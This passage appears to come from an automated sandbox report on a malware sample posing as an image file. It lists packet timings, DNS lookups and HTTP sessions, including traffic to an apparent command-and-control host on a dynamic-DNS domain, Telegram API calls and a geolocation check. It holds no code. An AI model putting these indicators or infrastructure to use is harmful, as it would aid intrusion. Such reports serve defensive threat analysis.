                                                                                                                            Oct 3, 2022 16:03:32.638447046 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.638494968 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.638597012 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.638643026 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.638665915 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.638673067 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.638730049 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.638732910 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.638753891 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.638792992 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.638822079 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.638907909 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.638962984 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.638972044 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.638983965 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.639015913 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.639035940 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.663038015 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.663110018 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.663193941 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.663225889 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.663238049 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.664741993 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.664798021 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.664824009 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.664834023 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.664860964 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.664887905 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.690682888 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.690771103 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.690882921 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.690946102 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.690995932 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691040039 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691106081 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691107035 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691137075 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691167116 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691190004 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691287041 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691334009 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691346884 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691364050 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691389084 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691404104 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691484928 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691535950 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691544056 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691564083 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691593885 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691611052 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691674948 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691725969 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691740036 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691751003 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.691790104 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691804886 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.691875935 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.712996960 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.713062048 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.713134050 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.713170052 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.713192940 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.713998079 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.714056015 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.714103937 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.714135885 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.714154005 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.715312004 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.716918945 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.716974020 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.717022896 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.717047930 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.717067003 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.717355967 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.717406034 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.717426062 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.717443943 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.717462063 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.717900991 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.717945099 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.717993021 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.717993021 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.718015909 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.718036890 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.718055964 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.718231916 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.718261957 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.718298912 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.718313932 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.718328953 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.718580008 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.718611002 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.718643904 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.718657017 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.718676090 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.718698025 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.718971014 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.719003916 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.719043970 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.719062090 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.719079018 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.719863892 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.744885921 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.744935989 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.745069027 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.745105982 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.745127916 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.746843100 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.768363953 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.768419981 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.768580914 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.768605947 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.768661022 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.791629076 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.791691065 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.791806936 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.791846991 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.791853905 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.791878939 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.791899920 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.791939974 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.815327883 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.815381050 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.815598011 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.815628052 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.815691948 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.815726995 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.815766096 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.815773964 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.815818071 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.816178083 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.816206932 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.816297054 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.816313982 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.839816093 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.839864969 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840028048 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840054989 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840125084 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.840174913 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840229034 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.840229034 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840271950 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840296984 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.840331078 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840368032 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840394974 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840570927 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.840570927 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.840599060 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.840720892 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.864350080 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.864420891 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.864579916 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.864733934 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.864768028 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.864841938 CEST44349702144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:32.864922047 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.864993095 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:03:32.868181944 CEST49702443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:04:48.713821888 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:48.816972017 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:48.817080021 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:48.830827951 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:48.942543030 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:48.988006115 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:49.090229034 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:49.097151041 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:49.239916086 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:49.240031004 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:49.394927025 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:50.117777109 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:50.120027065 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:50.224946022 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:50.269401073 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:50.475826025 CEST4970480192.168.2.3178.237.33.50
                                                                                                                            Oct 3, 2022 16:04:50.501506090 CEST8049704178.237.33.50192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:50.501641989 CEST4970480192.168.2.3178.237.33.50
                                                                                                                            Oct 3, 2022 16:04:50.502177000 CEST4970480192.168.2.3178.237.33.50
                                                                                                                            Oct 3, 2022 16:04:50.537388086 CEST8049704178.237.33.50192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:50.537535906 CEST4970480192.168.2.3178.237.33.50
                                                                                                                            Oct 3, 2022 16:04:50.732516050 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:04:50.886343002 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:51.536720991 CEST8049704178.237.33.50192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:51.536828041 CEST4970480192.168.2.3178.237.33.50
                                                                                                                            Oct 3, 2022 16:05:20.307468891 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:05:20.309464931 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:05:20.452879906 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:05:50.552537918 CEST20284970379.134.225.75192.168.2.3
                                                                                                                            Oct 3, 2022 16:05:50.554493904 CEST497032028192.168.2.379.134.225.75
                                                                                                                            Oct 3, 2022 16:05:50.704435110 CEST20284970379.134.225.75192.168.2.3

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Oct 3, 2022 16:01:57.446190119 CEST6270453192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:01:57.465598106 CEST53627048.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:09.102235079 CEST5784053192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:03:09.121256113 CEST53578408.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:03:30.938976049 CEST5799053192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:03:30.956290007 CEST53579908.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:41.542501926 CEST5238753192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:04:42.552985907 CEST5238753192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:04:43.611475945 CEST5238753192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:04:45.597717047 CEST5238753192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:04:46.559922934 CEST53523878.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:46.706528902 CEST53523878.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:47.571279049 CEST53523878.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:47.592310905 CEST5692453192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:04:48.598185062 CEST5692453192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:04:48.630491972 CEST53523878.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:48.706839085 CEST53569248.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:50.443613052 CEST6062553192.168.2.38.8.8.8
                                                                                                                            Oct 3, 2022 16:04:50.460649014 CEST53606258.8.8.8192.168.2.3
                                                                                                                            Oct 3, 2022 16:04:52.610661983 CEST53569248.8.8.8192.168.2.3

                                                                                                                            ICMP Packets

                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                            Oct 3, 2022 16:04:46.706621885 CEST192.168.2.38.8.8.8d006(Port unreachable)Destination Unreachable
                                                                                                                            Oct 3, 2022 16:04:48.630664110 CEST192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable
                                                                                                                            Oct 3, 2022 16:04:52.610747099 CEST192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Oct 3, 2022 16:01:57.446190119 CEST192.168.2.38.8.8.80x1a6eStandard query (0)www.uplooder.netA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:03:09.102235079 CEST192.168.2.38.8.8.80x2f98Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:03:30.938976049 CEST192.168.2.38.8.8.80x2d4cStandard query (0)www.uplooder.netA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:41.542501926 CEST192.168.2.38.8.8.80xb801Standard query (0)remcapi.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:42.552985907 CEST192.168.2.38.8.8.80xb801Standard query (0)remcapi.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:43.611475945 CEST192.168.2.38.8.8.80xb801Standard query (0)remcapi.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:45.597717047 CEST192.168.2.38.8.8.80xb801Standard query (0)remcapi.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:47.592310905 CEST192.168.2.38.8.8.80x2272Standard query (0)remcapi.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:48.598185062 CEST192.168.2.38.8.8.80x2272Standard query (0)remcapi.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:50.443613052 CEST192.168.2.38.8.8.80x3519Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Oct 3, 2022 16:01:57.465598106 CEST8.8.8.8192.168.2.30x1a6eNo error (0)www.uplooder.net144.76.120.25A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:03:09.121256113 CEST8.8.8.8192.168.2.30x2f98No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:03:30.956290007 CEST8.8.8.8192.168.2.30x2d4cNo error (0)www.uplooder.net144.76.120.25A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:46.559922934 CEST8.8.8.8192.168.2.30xb801Server failure (2)remcapi.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:46.706528902 CEST8.8.8.8192.168.2.30xb801No error (0)remcapi.duckdns.org79.134.225.75A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:47.571279049 CEST8.8.8.8192.168.2.30xb801Server failure (2)remcapi.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:48.630491972 CEST8.8.8.8192.168.2.30xb801Server failure (2)remcapi.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:48.706839085 CEST8.8.8.8192.168.2.30x2272No error (0)remcapi.duckdns.org79.134.225.75A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:50.460649014 CEST8.8.8.8192.168.2.30x3519No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2022 16:04:52.610661983 CEST8.8.8.8192.168.2.30x2272Server failure (2)remcapi.duckdns.orgnonenoneA (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • www.uplooder.net
                                                                                                                            • api.telegram.org
                                                                                                                            • geoplugin.net

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            0192.168.2.349698144.76.120.25443C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            1192.168.2.349701149.154.167.220443C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            2192.168.2.349702144.76.120.25443C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            3192.168.2.349704178.237.33.5080C:\Users\user\AppData\Roaming\FILE.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Oct 3, 2022 16:04:50.502177000 CEST3835OUTGET /json.gp HTTP/1.1
                                                                                                                            Host: geoplugin.net
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Oct 3, 2022 16:04:50.537388086 CEST3836INHTTP/1.1 200 OK
                                                                                                                            date: Mon, 03 Oct 2022 12:49:28 GMT
                                                                                                                            server: Apache
                                                                                                                            content-length: 961
                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                            cache-control: public, max-age=300
                                                                                                                            access-control-allow-origin: *
                                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 52 65 73 74 6f 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 56 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 31 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 38 2e 39 36 30 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 33 34 32 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 